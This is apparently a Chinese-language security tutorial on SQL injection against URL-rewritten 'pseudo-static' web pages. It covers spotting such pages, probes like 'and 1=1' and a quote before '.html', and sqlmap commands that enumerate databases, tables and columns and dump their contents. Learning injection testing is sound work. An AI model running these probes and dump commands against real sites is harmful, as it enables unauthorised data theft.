当你的才华
还撑不起你的野心时
那你就应该静下心来学习
目录
0x1什么是伪静态?
“伪静态”顾名思义就是一种表面上看似是静态网页(以.html、.htm等结尾),不存在任何的数据交互,却其实是动态网页,存在数据交互的网站,具有这种特性的网页成为“伪静态网页”。我们看到的伪静态网页其实是经过处理的,将动态网页的id等参数通过URL重写来隐藏,让查看者以为是静态网页。
伪静态注入
http://xxx.xxx.com/static/xxx/2019.htm
比如这个URL,结尾的后缀名是一个静态的htm,但前面却有index.php ,这就是比较典型的伪静态
还有一些做的比较好点的,我们不知道要测试网站用的是什么脚本的时候该怎么办?
我们可以进入被测试网站主页是利用什么脚本写的,尝试输入
index.php
index.asp
index.asps
index.jsp
尝试输入index.asp、index.asps、index.jsp 都处于加载中无页面响应,index.php 尝试发现成功,且页面回显正常,但好像我们这个页面并没什么数据(我也不晓得是什么原因),或者用工具查看页面是什么架构和脚本写的,我这里使用的是Wappalyzer 谷歌扩展插件
Wappalyzer 官网下载链接:
注:如果去掉 .html 后没有报错 ,就代表是伪静态,那么就尝试 and 1=1 和 and 1=2 来尝试
如何辨明伪静态网站
如果看到一个以.html或者.htm结尾的网页,此时可以通过呢在在地址输入框中输入:
javascript:alert(document.lastModified),来得到网页最后的修改时间,如果得到的时间和现在时间一致,此页面就是伪静态,反之是真静态;因为动态页面的最后修改时间总是当前时间,而静态页面的最后修改时间则是它生成的时间。
在平时的测试过程中我们经常会看到这样一类奇特的地址:
http://xxx.xxx.xx.xx:xxx/test.php/id/1.html (原型一般为:http://xxx.xxx.xx.xx:xxx/test.php?id=1 )
像上面这种类型的网址URL,往往是一种伪静态网页,遇到这种情况可以直接对".html"之前的参数加“'”进行判断是否存在注入!
测试工具
• 穿山甲
• 阿D注入
• Sqlmap等等工具
Sqlmap 伪静态注入步骤
1.分析是否为伪静态
www.xxx.com/xxx.html
控制台:document.lastModified
按上下箭头 看时间是否改变 如果改变就是伪静态
2.--database
sqlmap.py -u "www.xxx.com/xxx.html" --database
爆数据库名
3.--current-db
sqlmap.py -u "www.xxx.com/xxx.html" --current-db
在SQLmap中 哪里存在注入点就在哪里输入
4.-D "数据库名" --tables
sqlmap.py -u "www.xxx.com/xxx*.html" -D 数据库 --tables
5.-D "数据库名" -T "表名" --columns
sqlmap.py -u "www.xxx.com/xxx*.html" -D 数据库 -T 表名 --columns
6.-D "数据库名" -T "表名" -C "列名" --dump
sqlmap.py -u "www.xxx.com/xxx*.html" -D 数据库 -T 表名 -C 列1,列2 --dump
参考链接:
https://blog.csdn.net/Fly_hps/article/details/79487137
https://blog.csdn.net/weixin_44116496/article/details/86517154
https://www.cnblogs.com/netcorner/archive/2010/12/21/2911973.html
虽然我们生活在阴沟里,但依然有人仰望星空!